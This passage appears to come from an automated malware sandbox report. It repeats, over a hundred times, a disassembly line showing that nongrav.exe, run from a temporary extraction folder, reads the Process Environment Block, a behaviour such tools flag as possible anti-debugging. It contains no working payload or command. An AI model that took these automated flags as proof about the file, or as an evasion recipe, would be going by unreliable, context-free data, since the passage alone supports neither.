Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB90EA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h] 15_2_1EADAAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h] 15_2_1EADAAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFFAB0 mov eax, dword ptr fs:[00000030h] 15_2_1EAFFAB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5FE87 mov eax, dword ptr fs:[00000030h] 15_2_1EB5FE87
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h] 15_2_1EAFD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h] 15_2_1EAFD294
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2AE4 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2AE4
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF16E0 mov ecx, dword ptr fs:[00000030h] 15_2_1EAF16E0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD76E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAD76E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF36CC mov eax, dword ptr fs:[00000030h] 15_2_1EAF36CC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2ACB mov eax, dword ptr fs:[00000030h] 15_2_1EAF2ACB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98ED6 mov eax, dword ptr fs:[00000030h] 15_2_1EB98ED6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7FEC0 mov eax, dword ptr fs:[00000030h] 15_2_1EB7FEC0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB08EC7 mov eax, dword ptr fs:[00000030h] 15_2_1EB08EC7
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7FE3F mov eax, dword ptr fs:[00000030h] 15_2_1EB7FE3F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACE620 mov eax, dword ptr fs:[00000030h] 15_2_1EACE620
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h] 15_2_1EB04A2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h] 15_2_1EB04A2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD8A0A mov eax, dword ptr fs:[00000030h] 15_2_1EAD8A0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h] 15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h] 15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h] 15_2_1EACC600
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF8E00 mov eax, dword ptr fs:[00000030h] 15_2_1EAF8E00
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81608 mov eax, dword ptr fs:[00000030h] 15_2_1EB81608
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE3A1C mov eax, dword ptr fs:[00000030h] 15_2_1EAE3A1C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h] 15_2_1EAFA61C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h] 15_2_1EAFA61C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h] 15_2_1EACAA16
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h] 15_2_1EACAA16
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov ecx, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h] 15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD766D mov eax, dword ptr fs:[00000030h] 15_2_1EAD766D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB0927A mov eax, dword ptr fs:[00000030h] 15_2_1EB0927A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h] 15_2_1EB7B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h] 15_2_1EB7B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98A62 mov eax, dword ptr fs:[00000030h] 15_2_1EB98A62
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h] 15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB54257 mov eax, dword ptr fs:[00000030h] 15_2_1EB54257
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h] 15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8EA55 mov eax, dword ptr fs:[00000030h] 15_2_1EB8EA55
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h] 15_2_1EB8AE44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h] 15_2_1EB8AE44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h] 15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h] 15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h] 15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB95BA5 mov eax, dword ptr fs:[00000030h] 15_2_1EB95BA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h] 15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h] 15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h] 15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h] 15_2_1EAD1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h] 15_2_1EAD1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8138A mov eax, dword ptr fs:[00000030h] 15_2_1EB8138A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB7D380 mov ecx, dword ptr fs:[00000030h] 15_2_1EB7D380
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF2397 mov eax, dword ptr fs:[00000030h] 15_2_1EAF2397
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD8794 mov eax, dword ptr fs:[00000030h] 15_2_1EAD8794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFB390 mov eax, dword ptr fs:[00000030h] 15_2_1EAFB390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB037F5 mov eax, dword ptr fs:[00000030h] 15_2_1EB037F5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEDBE9 mov eax, dword ptr fs:[00000030h] 15_2_1EAEDBE9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h] 15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h] 15_2_1EB453CA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h] 15_2_1EB453CA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h] 15_2_1EAC4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h] 15_2_1EAC4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFE730 mov eax, dword ptr fs:[00000030h] 15_2_1EAFE730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h] 15_2_1EAFA70E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h] 15_2_1EAFA70E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB8131B mov eax, dword ptr fs:[00000030h] 15_2_1EB8131B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h] 15_2_1EB5FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h] 15_2_1EB5FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h] 15_2_1EB9070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h] 15_2_1EB9070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAEF716 mov eax, dword ptr fs:[00000030h] 15_2_1EAEF716
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACDB60 mov ecx, dword ptr fs:[00000030h] 15_2_1EACDB60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADFF60 mov eax, dword ptr fs:[00000030h] 15_2_1EADFF60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98F6A mov eax, dword ptr fs:[00000030h] 15_2_1EB98F6A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h] 15_2_1EAF3B7A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h] 15_2_1EAF3B7A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98B58 mov eax, dword ptr fs:[00000030h] 15_2_1EB98B58
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACDB40 mov eax, dword ptr fs:[00000030h] 15_2_1EACDB40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADEF40 mov eax, dword ptr fs:[00000030h] 15_2_1EADEF40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EACF358 mov eax, dword ptr fs:[00000030h] 15_2_1EACF358
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h] 15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFF0BF mov ecx, dword ptr fs:[00000030h] 15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h] 15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h] 15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB090AF mov eax, dword ptr fs:[00000030h] 15_2_1EB090AF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC9080 mov eax, dword ptr fs:[00000030h] 15_2_1EAC9080
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h] 15_2_1EB43884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h] 15_2_1EB43884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAD849B mov eax, dword ptr fs:[00000030h] 15_2_1EAD849B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAC58EC mov eax, dword ptr fs:[00000030h] 15_2_1EAC58EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB814FB mov eax, dword ptr fs:[00000030h] 15_2_1EB814FB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h] 15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h] 15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h] 15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov ecx, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h] 15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB98CD6 mov eax, dword ptr fs:[00000030h] 15_2_1EB98CD6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h] 15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFBC2C mov eax, dword ptr fs:[00000030h] 15_2_1EAFBC2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h] 15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h] 15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h] 15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h] 15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h] 15_2_1EB94015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h] 15_2_1EB94015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h] 15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h] 15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h] 15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h] 15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h] 15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE746D mov eax, dword ptr fs:[00000030h] 15_2_1EAE746D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB82073 mov eax, dword ptr fs:[00000030h] 15_2_1EB82073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB91074 mov eax, dword ptr fs:[00000030h] 15_2_1EB91074
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAFA44B mov eax, dword ptr fs:[00000030h] 15_2_1EAFA44B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h] 15_2_1EB5C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h] 15_2_1EB5C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h] 15_2_1EAE0050
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h] 15_2_1EAE0050
